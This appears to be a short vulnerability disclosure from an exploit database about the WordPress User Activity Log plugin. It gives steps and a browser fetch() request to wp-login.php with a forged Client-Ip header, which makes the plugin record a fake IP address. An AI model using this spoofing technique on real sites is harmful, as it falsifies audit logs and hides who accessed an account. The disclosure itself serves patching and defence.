Share
## https://sploitus.com/exploit?id=WPEX-ID:36C30E54-75E4-4DF1-B01A-60C51C0E76A3
1. In User Activity Log > Settings, enable the setting "Allow Ip Address of users to log." and save settings.

2. Run the following code in the web browser and note on the backend that the IP address has been faked.

await fetch("/wp-login.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
    "Client-Ip": "8.8.8.8",
  },
  "body": "log=USERNAME&pwd=PASSWORD",
  "method": "POST",
  "mode": "cors",
  "credentials": "include"
});